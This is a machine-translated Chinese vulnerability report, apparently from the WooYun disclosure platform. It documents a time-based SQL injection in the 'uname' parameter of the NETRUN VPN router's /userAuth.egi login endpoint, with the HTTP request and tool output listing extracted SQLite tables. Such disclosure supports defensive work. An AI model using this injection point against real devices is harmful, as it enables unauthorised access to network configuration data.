漏洞标题 NETRUN VPN Internet行为管理路由器通用注入 相关制造商 南京网润科技有限公司 漏洞作者 Aasron 提交时间 2016-05-10 20: 40 公共时间 2016-06-27 16: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构（cncert National Internet Emergency Center） 标签标签 字符类型注入，注入技术，SQLit 漏洞详细信息 NETRUN VPN Internet行为管理路由器 GET /userAuth.egi?uname=admin&upwd=123456 HTTP/1.1 主机: **。**。**。** 用户代理: Mozilla/5.0（Windows NT 6.1; WOW64; rv: 45.0）Gecko/20100101 Firefox/45.0 接受: */* Accept-Language: zh-CN，zh; q=0.8，en-US; q=0.5，en; Q=0.3 Accept-Encoding: gzip，deflate X-Requested-With: XMLHttpRequest Referer:http://**。**。**。**/login.esp Cookie: _appwebSessionId_=34a5859e906dad5ee9f885b79496a14f 连接:关闭 注射参数#uname 由于频率太快，访问受到限制，因此延迟用于注入。 漏洞证明： [17: 43: 17] [INFO]获取数据库:'SQLite_masterd的表 [17: 43: 17] [INFO]获取数据库'SQLit的表数 [17: 43: 17] [INFO]检索到: 39 [17: 43: 19] [INFO]检索到: app_group_t [17: 43: 33] [INFO]检索到: app_obj_t [17: 43: 45] [INFO]检索到: app_user_t [17: 43: 59] [INFO]检索到: apptc_obj_t [17: 44: 14] [INFO]检索到: broad_group_t [17: 44: 31] [INFO]检索到: broad_obj_t 从对等方接收数据时失败 [17: 47: 51] [INFO]检索到: fw_policy_t [17: 48: 05] [INFO]检索到: fw_time_t [17: 48: 18] [INFO]检索到: group_t [17: 48: 27] [INFO]检索到: group_user_t [17: 48: 43] [INFO]检索到: if_config_t [17: 48: 58] [INFO]检索到: ip_mac_t [17: 49: 10] [INFO]检索到: ipsec_gateway_t [17: 49: 31] [INFO]检索到: ipsec_tunnel_t [17: 49: 49] [INFO]检索到: nat_conf_t [17: 50: 04] [INFO]检索到:对象 附件案地址： ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / 修理计划： 过滤，逃脱 版权声明：请注明出处Aasron @乌云